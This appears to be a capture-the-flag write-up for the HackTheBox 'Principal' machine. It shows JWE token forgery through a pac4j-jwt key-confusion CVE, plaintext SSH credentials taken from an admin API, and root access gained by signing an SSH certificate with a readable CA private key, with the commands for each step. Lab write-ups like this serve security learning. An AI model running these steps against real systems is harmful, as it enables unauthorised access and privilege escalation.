Share
## https://sploitus.com/exploit?id=DCE7EEC0-E42F-5105-87F4-FBCC4CDE31C4
# HackTheBox โ€” Principal

**Difficulty:** Medium
**OS:** Linux
**Platform:** HackTheBox

---

## Overview

Web application running pac4j-jwt v6.0.3 โ€” vulnerable to CVE-2026-29000. The public RSA key is exposed unauthenticated via a JWKS endpoint and can be used to forge a valid admin JWE token, bypassing authentication entirely. With admin access, plaintext SSH credentials are recovered from the settings API. The service account is a member of the `deployers` group with read access to an SSH CA private key trusted by sshd โ€” signing a certificate granting root access completes the box.

---

## 1. Enumeration

Browsed to the web application and viewed page source. Found the main JavaScript bundle at `/static/js/app.js`.

Key API endpoints identified inside `app.js`:

```
/api/auth/login
/api/auth/jwks      :8080/api/auth/jwks
# Returns RSA public key (kid: enc-key-1)
```

CVE-2026-29000 allows the public key to be used to forge a valid JWE token โ€” the library incorrectly accepts tokens encrypted with the public key instead of requiring the private key.

Used the PoC to generate a forged admin token:

```bash
python3 poc.py \
  --jwks http://:8080/api/auth/jwks \
  --user admin \
  --role ROLE_ADMIN
```

---

## 3. Admin API Access

Used the forged token as a Bearer token in Burp Repeater:

```
Authorization: Bearer 
```

**GET /api/dashboard** โ†’ 200 OK
- Confirmed role: `ROLE_ADMIN`
- Activity log showed `CERT_ISSUED` actions for user: `svc-deploy`

**GET /api/settings** โ†’ 200 OK
- SSH credentials found in plaintext in the security config
- SSH certificate auth enabled
- SSH CA path: `/opt/principal/ssh/`

---

## 4. Initial Access

SSH'd in using credentials recovered from `/api/settings`:

```bash
ssh svc-deploy@
```

User flag retrieved.

---

## 5. Privilege Escalation โ€” SSH CA Signing

`svc-deploy` is in the `deployers` group with read access to `/opt/principal/ssh/`:

```bash
ls -la /opt/principal/ssh/
# ca        โ€” RSA 4096-bit CA private key (readable by deployers)
# ca.pub    โ€” CA public key
# README.txt โ€” confirms CA is trusted by sshd
```

The CA private key is readable. Since sshd trusts this CA, any certificate signed by it is accepted โ€” including one granting root access.

```bash
# Generate a new keypair
ssh-keygen -t ed25519 -f /tmp/privesc

# Sign with the CA, granting principal 'root'
ssh-keygen -s /opt/principal/ssh/ca -I pwned -n root -V +1h /tmp/privesc.pub

# SSH as root
ssh -i /tmp/privesc root@
```

Root flag retrieved.

---

## Flags

- **User:** `/home/svc-deploy/user.txt`
- **Root:** `/root/root.txt`

---

## Key Takeaways

- Always check JWT library versions during web app recon โ€” pac4j-jwt is common in Java applications.
- CVE-2026-29000: pac4j JWE key confusion โ€” public key accepted where private key is required.
- API settings endpoints often leak credentials in plaintext โ€” always enumerate all authenticated routes once you have a valid token.
- If a service account can read an SSH CA private key trusted by sshd, you can sign a certificate as any principal including root. Check group memberships and CA key permissions during post-exploitation.